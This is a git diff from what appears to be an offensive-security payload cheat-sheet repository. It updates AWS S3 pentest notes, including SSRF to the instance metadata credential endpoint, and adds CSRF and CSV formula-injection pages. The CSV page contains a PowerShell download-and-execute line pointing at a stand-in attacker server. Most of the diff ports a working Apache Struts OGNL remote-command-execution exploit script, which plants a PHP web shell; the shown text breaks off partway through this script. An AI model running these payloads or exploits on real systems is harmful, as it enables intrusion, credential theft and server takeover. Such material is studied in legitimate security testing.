Fix typo in PHP Object injection

GraphQL + RDP Bruteforce + PostgreSQL RCE
PostgreSQL rewrite + LFI SSH
2019-07-05 18:42:42 +02:00 · 2019-07-01 23:29:29 +02:00 · 2019-06-29 19:23:34 +02:00 · 2019-06-29 17:55:13 +02:00 · 2019-06-29 11:20:17 +02:00 · 2019-06-28 17:30:12 +02:00
374 changed files with 7364 additions and 2338 deletions
--- a/.gitignore
+++ b/.gitignore
@@ -1,3 +1,4 @@
 BuildPDF/
 .vscode
 .todo
 AWS Amazon Lambda/
--- a/S3/README.md
+++ b/S3/README.md
@@ -1,5 +1,50 @@
 # Amazon Bucket S3 AWS
 ## Summary
 - [Tools](#tools)
 - [AWS Configuration](#aws-configuration)
 - [Open Bucket](#open-bucket)
 - [Basic tests](#basic-tests)
 	- [Listing files](#listing-files)
 	- [Move a file into the bucket](move-a-file-into-the-bucket)
 	- [Download every things](#download-every-things)
 	- [Check bucket disk size](#check-bucket-disk-size)
 - [AWS - Extract Backup](#aws---extract-backup)
 - [Bucket juicy data](#bucket-juicy-data)
 ## Tools
 - [Pacu - The AWS exploitation framework, designed for testing the security of Amazon Web Services environments](https://github.com/RhinoSecurityLabs/pacu)
 - [Bucket Finder - Search for readable buckets and list all the files in them](https://digi.ninja/)
 	```powershell
 	wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
 	./bucket_finder.rb my_words
 	./bucket_finder.rb --region ie my_words
 		US Standard         = http://s3.amazonaws.com
 		Ireland             = http://s3-eu-west-1.amazonaws.com
 		Northern California = http://s3-us-west-1.amazonaws.com
 		Singapore           = http://s3-ap-southeast-1.amazonaws.com
 		Tokyo               = http://s3-ap-northeast-1.amazonaws.com
 	./bucket_finder.rb --download --region ie my_words
 	./bucket_finder.rb --log-file bucket.out my_words
 	```
 - [Boto3 - Amazon Web Services (AWS) SDK for Python](https://boto3.amazonaws.com/v1/documentation/api/latest/index.html)
 	```python
 	import boto3
 	# Create an S3 client
 	s3 = boto3.client('s3',aws_access_key_id='AKIAJQDP3RKREDACTED',aws_secret_access_key='igH8yFmmpMbnkcUaCqXJIRIozKVaREDACTED',region_name='us-west-1')
 	try:
 		result = s3.list_buckets()
 		print(result)
 	except Exception as e:
 		print(e)
 	```
 ## AWS Configuration
 Prerequisites, at least you need awscli
 ```bash
@@ -19,7 +64,17 @@ AWSSecretKey=[ENTER HERE YOUR KEY]
 aws configure --profile nameofprofile
 ```
-then you can use *--profile nameofprofile* in the aws command
+then you can use *--profile nameofprofile* in the aws command.
 Alternatively you can use environment variables instead of creating a profile.
 ```bash
 export AWS_ACCESS_KEY_ID=ASIAZ[...]PODP56
 export AWS_SECRET_ACCESS_KEY=fPk/Gya[...]4/j5bSuhDQ
 export AWS_SESSION_TOKEN=FQoGZXIvYXdzE[...]8aOK4QU=
 ```
 ## Open Bucket
 By default the name of Amazon Bucket are like http://s3.amazonaws.com/[bucket_name]/, you can browse open buckets if you know their names
@@ -36,7 +91,17 @@ Their names are also listed if the listing is enabled.
 <Name>adobe-REDACTED-REDACTED-REDACTED</Name>
 ```
-## Basic test - Listing the files
+Alternatively you can extract the name of inside-site s3 bucket with `%C0`. (Trick from https://twitter.com/0xmdv/status/1065581916437585920)
 ```xml
 http://example.com/resources/id%C0
 eg: http://redacted/avatar/123%C0
 ```
 ## Basic tests
 ### Listing files
 ```bash
 aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here
@@ -55,7 +120,7 @@ Non-authoritative answer:
 11.192.218.52.in-addr.arpa name = s3-website-us-west-2.amazonaws.com.
 ```
-## Move a file into the bucket
+### Move a file into the bucket
 ```bash
 aws s3 cp local.txt s3://some-bucket/remote.txt --acl authenticated-read
@@ -70,13 +135,15 @@ aws s3 mv test.txt s3://hackerone.files
 SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"
 ```
-## Download every things (in an open bucket)
+### Download every things
 ```powershell
 aws s3 sync s3://level3-9afd3927f195e10225021a578e6f78df.flaws.cloud/ . --no-sign-request --region us-west-2
 ```
-## Check bucket disk size (authenticated) use, --no-sign for un-authenticated 
+### Check bucket disk size
 Use `--no-sign` for un-authenticated check.
 ```powershell
 aws s3 ls s3://<bucketname> --recursive  | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'
@@ -103,7 +170,7 @@ sudo file -s /dev/xvda1
 sudo mount /dev/xvda1 /mnt
 ```
-## Bucket informations
+## Bucket juicy data
 Amazon exposes an internal service every EC2 instance can query for instance metadata about the host. If you found an SSRF vulnerability that runs on EC2, try requesting :
@@ -116,34 +183,40 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/PhotonInstance
 For example with a proxy : http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws/
 ## Bucket Finder
-A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files.
+## Enumerate IAM permissions
 Enumerate the permissions associated with AWS credential set with [enumerate-iam](https://github.com/andresriancho/enumerate-iam)
 ```powershell
-wget https://digi.ninja/files/bucket_finder_1.1.tar.bz2 -O bucket_finder_1.1.tar.bz2
+git clone git@github.com:andresriancho/enumerate-iam.git
-./bucket_finder.rb my_words
+cd enumerate-iam/
-./bucket_finder.rb --region ie my_words
+pip install -r requirements.txt
-	US Standard         = http://s3.amazonaws.com
+./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
-	Ireland             = http://s3-eu-west-1.amazonaws.com
+2019-05-10 15:57:58,447 - 21345 - [INFO] Starting permission enumeration for access-key-id "AKIA..."
-	Northern California = http://s3-us-west-1.amazonaws.com
+2019-05-10 15:58:01,532 - 21345 - [INFO] Run for the hills, get_account_authorization_details worked!
-	Singapore           = http://s3-ap-southeast-1.amazonaws.com
+2019-05-10 15:58:01,537 - 21345 - [INFO] -- {
-	Tokyo               = http://s3-ap-northeast-1.amazonaws.com
+    "RoleDetailList": [
-
+        {
-./bucket_finder.rb --download --region ie my_words
+            "Tags": [], 
-./bucket_finder.rb --log-file bucket.out my_words
+            "AssumeRolePolicyDocument": {
                "Version": "2008-10-17", 
                "Statement": [
                    {
 ...
 2019-05-10 15:58:26,709 - 21345 - [INFO] -- gamelift.list_builds() worked!
 2019-05-10 15:58:26,850 - 21345 - [INFO] -- cloudformation.list_stack_sets() worked!
 2019-05-10 15:58:26,982 - 21345 - [INFO] -- directconnect.describe_locations() worked!
 2019-05-10 15:58:27,021 - 21345 - [INFO] -- gamelift.describe_matchmaking_rule_sets() worked!
 2019-05-10 15:58:27,311 - 21345 - [INFO] -- sqs.list_queues() worked!
 ```
-Use a custom wordlist for the bucket finder, can be created with
+## References
-```powershell
+* [There's a Hole in 1,951 Amazon S3 Buckets - Mar 27, 2013 - Rapid7 willis](https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets)
 List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart, walmart.com, walmart-backup, walmart-media.
 List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, walmart.com becomes www.walmart.com, www.walmart.net, walmart.com, and walmart.
 ```
 ## Thanks to
 * https://community.rapid7.com/community/infosec/blog/2013/03/27/1951-open-s3-buckets
 * https://digi.ninja/projects/bucket_finder.php
 * [Bug Bounty Survey - AWS Basic test](https://twitter.com/bugbsurveys/status/859389553211297792)
-* [FlAWS.cloud Challenge based on AWS vulnerabilities](http://flaws.cloud/)
+* [flaws.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws.cloud/)
 * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud)
 * [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/)
 * [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/)
 * [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/)
--- a/BOOKS.md
+++ b/BOOKS.md
@@ -0,0 +1,22 @@
 # Book's list
 Grab a book and relax, these ones are the best security books (in my opinion).
 - [Web Hacking 101](https://leanpub.com/web-hacking-101)
 - [Breaking into Information Security: Learning the Ropes 101 - Andrew Gill](https://leanpub.com/ltr101-breaking-into-infosec)
 - [OWASP Testing Guide v4](https://www.owasp.org/index.php/OWASP_Testing_Project)
 - [Penetration Testing: A Hands-On Introduction to Hacking](http://amzn.to/2dhHTSn)
 - [The Hacker Playbook 2: Practical Guide to Penetration Testing](http://amzn.to/2d9wYKa)
 - [The Hacker Playbook 3: Practical Guide to Penetration Testing - Red Team Edition](http://a.co/6MqC9bD)
 - [The Mobile Application Hacker’s Handbook](http://amzn.to/2cVOIrE)
 - [Black Hat Python: Python Programming for Hackers and Pentesters](http://www.amazon.com/Black-Hat-Python-Programming-Pentesters/dp/1593275900)
 - [Metasploit: The Penetration Tester's Guide](https://www.nostarch.com/metasploit)
 - [The Database Hacker's Handbook, David Litchfield et al., 2005](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0764578014.html)
 - [The Shellcoders Handbook by Chris Anley et al., 2007](http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html)
 - [The Mac Hacker's Handbook by Charlie Miller & Dino Dai Zovi, 2009](http://www.wiley.com/WileyCDA/WileyTitle/productCd-0470395362.html)
 - [The Web Application Hackers Handbook by D. Stuttard, M. Pinto, 2011](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118026470.html)
 - [iOS Hackers Handbook by Charlie Miller et al., 2012](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118204123.html)
 - [Android Hackers Handbook by Joshua J. Drake et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-111860864X.html)
 - [The Browser Hackers Handbook by Wade Alcorn et al., 2014](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118662091.html)
 - [The Mobile Application Hackers Handbook by Dominic Chell et al., 2015](http://www.wiley.com/WileyCDA/WileyTitle/productCd-1118958500.html)
 - [Car Hacker's Handbook by Craig Smith, 2016](https://www.nostarch.com/carhacking)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -95,7 +95,7 @@ Remainder:
 * %E5%98%BE = %3E = \u563e (>)
 * %E5%98%BC = %3C = \u563c (<)
-## Thanks to
+## References
 * https://www.owasp.org/index.php/CRLF_Injection
 * https://vulners.com/hackerone/H1:192749
--- a/Injection/crlfinjection.txt
+++ b/Injection/crlfinjection.txt
--- a/Injection/Images/CSRF-CheatSheet.png
+++ b/Injection/Images/CSRF-CheatSheet.png
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -0,0 +1,117 @@
 # Cross-Site Request Forgery
 > Cross-Site Request Forgery (CSRF/XSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. - OWASP
 ## Summary
 * [Methodology](#methodology)
 * [Payloads](#payloads)
    * [HTML GET - Requiring User Interaction](#)
    * [HTML GET - No User Interaction)](#)
    * [HTML POST - Requiring User Interaction](#)
    * [HTML POST - AutoSubmit - No User Interaction](#)
    * [JSON GET - Simple Request](#)
    * [JSON POST - Simple Request](#)
    * [JSON POST - Complex Request](#)
 ## Tools
 * [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe)
 ## Methodology
 ![CSRF_cheatsheet](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CSRF%20Injection/Images/CSRF-CheatSheet.png?raw=true)
 ## Payloads
 When you are logged in to a certain site, you typically have a session. The identifier of that session is stored in a cookie in your browser, and is sent with every request to that site. Even if some other site triggers a request, the cookie is sent along with the request and the request is handled as if the logged in user performed it.
 ### HTML GET - Requiring User Interaction
 ```html
 <a href="http://www.example.com/api/setusername?username=CSRFd">Click Me</a>
 ```
 ### HTML GET - No User Interaction
 ```html
 <img src="http://www.example.com/api/setusername?username=CSRFd">
 ```
 ### HTML POST - Requiring User Interaction
 ```html
 <form action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
 <input name="username" type="hidden" value="CSRFd" />
 <input type="submit" value="Submit Request" />
 </form>
 ```
 ### HTML POST - AutoSubmit - No User Interaction
 ```html
 <form id="autosubmit" action="http://www.example.com/api/setusername" enctype="text/plain" method="POST">
 <input name="username" type="hidden" value="CSRFd" />
 <input type="submit" value="Submit Request" />
 </form>
 <script>
 document.getElementById("autosubmit").submit();
 </script>
 ```
 ### JSON GET - Simple Request
 ```html
 <script>
 var xhr = new XMLHttpRequest();
 xhr.open("GET", "http://www.example.com/api/currentuser");
 xhr.send();
 </script>
 ```
 ### JSON POST - Simple Request
 ```html
 <script>
 var xhr = new XMLHttpRequest();
 xhr.open("POST", "http://www.example.com/api/setrole");
 //application/json is not allowed in a simple request. text/plain is the default
 xhr.setRequestHeader("Content-Type", "text/plain");
 //You will probably want to also try one or both of these
 //xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
 //xhr.setRequestHeader("Content-Type", "multipart/form-data");
 xhr.send('{"role":admin}');
 </script>
 ```
 ### JSON POST - Complex Request
 ```html
 <script>
 var xhr = new XMLHttpRequest();
 xhr.open("POST", "http://www.example.com/api/setrole");
 xhr.withCredentials = true;
 xhr.setRequestHeader("Content-Type", "application/json;charset=UTF-8");
 xhr.send('{"role":admin}');
 </script>
 ```
 ## References
 - [Cross-Site Request Forgery Cheat Sheet - Alex Lauerman - April 3rd, 2016](https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/)
 - [Cross-Site Request Forgery (CSRF) - OWASP](https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF))
 - [Messenger.com CSRF that show you the steps when you check for CSRF - Jack Whitton](https://whitton.io/articles/messenger-site-wide-csrf/) 
 - [Paypal bug bounty: Updating the Paypal.me profile picture without consent (CSRF attack) - Florian Courtial](https://hethical.io/paypal-bug-bounty-updating-the-paypal-me-profile-picture-without-consent-csrf-attack/)
 - [Hacking PayPal Accounts with one click (Patched) - Yasser Ali](http://yasserali.com/hacking-paypal-accounts-with-one-click/)
 - [Add tweet to collection CSRF - vijay kumar](https://hackerone.com/reports/100820)
 - [Facebookmarketingdevelopers.com: Proxies, CSRF Quandry and API Fun - phwd](http://philippeharewood.com/facebookmarketingdevelopers-com-proxies-csrf-quandry-and-api-fun/)
 - [How i Hacked your Beats account ? Apple Bug Bounty - @aaditya_purani](https://aadityapurani.com/2016/07/20/how-i-hacked-your-beats-account-apple-bug-bounty/)
 - [FORM POST JSON: JSON CSRF on POST Heartbeats API - Dr.Jones](https://hackerone.com/reports/245346)
 - [Hacking Facebook accounts using CSRF in Oculus-Facebook integration](https://www.josipfranjkovic.com/blog/hacking-facebook-oculus-integration-csrf)
 - [Cross site request forgery (CSRF) - Sjoerd Langkemper - Jan 9, 2019](http://www.sjoerdlangkemper.nl/2019/01/09/csrf/)
 - [Cross-Site Request Forgery Attack - PwnFunction](https://www.youtube.com/watch?v=eWEgUcHPle0)
 - [Wiping Out CSRF - Joe Rozner - Oct 17, 2017](#https://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f)
--- a/Injection/README.md
+++ b/Injection/README.md
@@ -0,0 +1,48 @@
 # CSV Injection (Formula Injection)
 Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
 ## Exploit
 Basic exploit with Dynamic Data Exchange
 ```powershell
 # pop a calc
 DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
 =2+5+cmd|' /C calc'!A0
 # pop a notepad
 =cmd|' /C notepad'!'A1'
 # powershell download and execute
 =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0
 # msf smb delivery with rundll32
 =cmd|'/c rundll32.exe \\10.0.0.1\3\2\1.dll,0'!_xlbgnm.A1
 ```
 Technical Details of the above payload:
 - `cmd` is the name the server can respond to whenever a client is trying to access the server
 - `/C` calc is the file name which in our case is the calc(i.e the calc.exe)
 - `!A0` is the item name that specifies unit of data that a server can respond when the client is requesting the data
 Any formula can be started with
 ```powershell
 =
 +
 –
@
 ```
 ## References
 * [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
 * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
 * [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
 * [CSV INJECTION: BASIC TO EXPLOIT!!!! - 30/11/2017 - Akansha Kesharwani](https://payatu.com/csv-injection-basic-to-exploit/)
 * [From CSV to Meterpreter - 5th November 2015 - Adam Chester](https://blog.xpnsec.com/from-csv-to-meterpreter/)
 * [CSV Injection -> Meterpreter on Pornhub - @ZephrFish Andy](https://news.webamooz.com/wp-content/uploads/bot/offsecmag/147.pdf)
 * [The Absurdly Underestimated Dangers of CSV Injection - 7 October, 2017 - George Mauer](http://georgemauer.net/2017/10/07/csv-injection.html)
--- a/injection/README.md
+++ b/injection/README.md
@@ -1,32 +0,0 @@
 # CSV Excel formula injection
 Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel,Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed.
 ## Exploit
 Basic exploit with Dynamic Data Exchange
 ```powershell
 DDE ("cmd";"/C calc";"!A0")A0
@SUM(1+1)*cmd|' /C calc'!A0
 ```
 Technical Details of the above payload:
 cmd is the name the server can respond to whenever a client is trying to access the server
 /C calc is the file name which in our case is the calc(i.e the calc.exe)
 !A0 is the item name that specifies unit of data that a server can respond when the client is requesting the data
 Any formula can be started with
 ```powershell
 =
 +
 –
@
 ```
 ## Thanks to
 * [OWASP - CSV Excel Macro Injection](https://owasp.org/index.php/CSV_Excel_Macro_Injection)
 * [Google Bug Hunter University - CSV Excel formula injection](https://sites.google.com/site/bughunteruniversity/nonvuln/csv-excel-formula-injection)
 * [Comma Separated Vulnerabilities - James Kettle](https://www.contextis.com/resources/blog/comma-separated-vulnerabilities/)
--- a/CVE-2018-11776_.py
+++ b/CVE-2018-11776_.py
@@ -1,13 +1,18 @@
 #!/usr/bin/python
-import urllib2
+from __future__ import print_function
 from future import standard_library
 standard_library.install_aliases()
 from builtins import input
 from builtins import str
 import urllib.request, urllib.error, urllib.parse
 import time
 import sys
 import os
-import commands
+import subprocess
 import requests
 import readline
-import urlparse
+import urllib.parse
 RED = '\033[1;31m'
 BLUE = '\033[94m'
@@ -32,179 +37,179 @@ logo = BLUE+'''
        =[ Command Execution v3]=
              By @s1kr10s
 '''+ENDC
-print logo
+print(logo)
-print " * Ejemplo: http(s)://www.victima.com/files.login\n"
+print(" * Ejemplo: http(s)://www.victima.com/files.login\n")
-host = raw_input(BOLD+" [+] HOST: "+ENDC)
+host = input(BOLD+" [+] HOST: "+ENDC)
 if len(host) > 0:
-	if host.find("https://") != -1 or host.find("http://") != -1:
+    if host.find("https://") != -1 or host.find("http://") != -1:
-		poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
+        poc = "?redirect:${%23w%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29.getWriter%28%29,%23w.println%28%27mamalo%27%29,%23w.flush%28%29,%23w.close%28%29}"
-		def exploit(comando):
+        def exploit(comando):
-			exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
+            exploit = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+comando+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
-			return exploit
+            return exploit
-		def exploit2(comando):
+        def exploit2(comando):
-			exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
+            exploit2 = "Content-Type:%{(+++#_='multipart/form-data').(+++#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(+++#_memberAccess?(+++#_memberAccess=#dm):((+++#container=#context['com.opensymphony.xwork2.ActionContext.container']).(+++#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(+++#ognlUtil.getExcludedPackageNames().clear()).(+++#ognlUtil.getExcludedClasses().clear()).(+++#context.setMemberAccess(+++#dm)))).(+++#shell='"+str(comando)+"').(+++#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(+++#shells=(+++#iswin?{'cmd.exe','/c',#shell}:{'/bin/sh','-c',#shell})).(+++#p=new java.lang.ProcessBuilder(+++#shells)).(+++#p.redirectErrorStream(true)).(+++#process=#p.start()).(+++#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(+++#process.getInputStream(),#ros)).(+++#ros.flush())}"
-			return exploit2
+            return exploit2
-		def exploit3(comando):
+        def exploit3(comando):
-			exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
+            exploit3 = "%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27"+comando+"%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D"
-			return exploit3
+            return exploit3
-		def pwnd(shellfile):
+        def pwnd(shellfile):
-			exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
+            exploitfile = "?redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{"+shellfile+"}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}"
-			return exploitfile
+            return exploitfile
-		def validador():
+        def validador():
-			arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
+            arr_lin_win = ["file%20/etc/passwd","dir","net%20users","id","/sbin/ifconfig","cat%20/etc/passwd"]
-			return arr_lin_win
+            return arr_lin_win
-		#def reversepl(ip,port):
+        #def reversepl(ip,port):
-		#	print "perl"
+        #       print "perl"
-		#def reversepy(ip,port):
+        #def reversepy(ip,port):
-		#	print "python"
+        #       print "python"
-		# CVE-2013-2251 ---------------------------------------------------------------------------------
+        # CVE-2013-2251 ---------------------------------------------------------------------------------
-		try:
+        try:
-			response = ''
+            response = ''
-			response = urllib2.urlopen(host+poc)
+            response = urllib.request.urlopen(host+poc)
-		except:
+        except:
-			print RED+" Servidor no responde\n"+ENDC
+            print(RED+" Servidor no responde\n"+ENDC)
-			exit(0)
+            exit(0)
-		print BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC
+        print(BOLD+"\n [+] EJECUTANDO EXPLOIT CVE-2013-2251"+ENDC)
-		if response.read().find("mamalo") != -1:
+        if response.read().find("mamalo") != -1:
-			print RED+"   [-] VULNERABLE"+ENDC
+            print(RED+"   [-] VULNERABLE"+ENDC)
-			owned = open('vulnsite.txt', 'a')
+            owned = open('vulnsite.txt', 'a')
-			owned.write(str(host)+'\n')
+            owned.write(str(host)+'\n')
-			owned.close()
+            owned.close()
-			opcion = raw_input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
+            opcion = input(YELLOW+"   [-] RUN THIS EXPLOIT (s/n): "+ENDC)
-			#print BOLD+"   * [SHELL REVERSA]"+ENDC
+            #print BOLD+"   * [SHELL REVERSA]"+ENDC
-			#print OTRO+"     Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
+            #print OTRO+"     Struts@Shell:$ reverse 127.0.0.1 4444 (perl,python,bash)\n"+ENDC
-			if opcion == 's':
+            if opcion == 's':
-				print YELLOW+"   [-] GET PROMPT...\n"+ENDC
+                print(YELLOW+"   [-] GET PROMPT...\n"+ENDC)
-				time.sleep(1)
+                time.sleep(1)
-				print BOLD+"   * [UPLOAD SHELL]"+ENDC
+                print(BOLD+"   * [UPLOAD SHELL]"+ENDC)
-				print OTRO+"     Struts@Shell:$ pwnd (php)\n"+ENDC
+                print(OTRO+"     Struts@Shell:$ pwnd (php)\n"+ENDC)
-				while 1:
+                while 1:
-					separador = raw_input(GREEN+"Struts2@Shell_1:$ "+ENDC)
+                    separador = input(GREEN+"Struts2@Shell_1:$ "+ENDC)
-					espacio = separador.split(' ')
+                    espacio = separador.split(' ')
-					comando = "','".join(espacio)
+                    comando = "','".join(espacio)
-					if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
+                    if espacio[0] != 'reverse' and espacio[0] != 'pwnd':
-						shell = urllib2.urlopen(host+exploit("'"+str(comando)+"'"))
+                        shell = urllib.request.urlopen(host+exploit("'"+str(comando)+"'"))
-						print "\n"+shell.read()
+                        print("\n"+shell.read())
-					elif espacio[0] == 'pwnd':
+                    elif espacio[0] == 'pwnd':
-						pathsave=raw_input("path EJ:/tmp/: ")
+                        pathsave=input("path EJ:/tmp/: ")
-						if espacio[1] == 'php':
+                        if espacio[1] == 'php':
-							shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
+                            shellfile = """'python','-c','f%3dopen("/tmp/status.php","w");f.write("<?php%20system($_GET[ksujenenuhw])?>")'"""
-							urllib2.urlopen(host+pwnd(str(shellfile)))
+                            urllib.request.urlopen(host+pwnd(str(shellfile)))
-							shell = urllib2.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
+                            shell = urllib.request.urlopen(host+exploit("'ls','-l','"+pathsave+"status.php'"))
-							if shell.read().find(pathsave+"status.php") != -1:
+                            if shell.read().find(pathsave+"status.php") != -1:
-								print BOLD+GREEN+"\nCreate File Successfull :) ["+pathsave+"status.php]\n"+ENDC
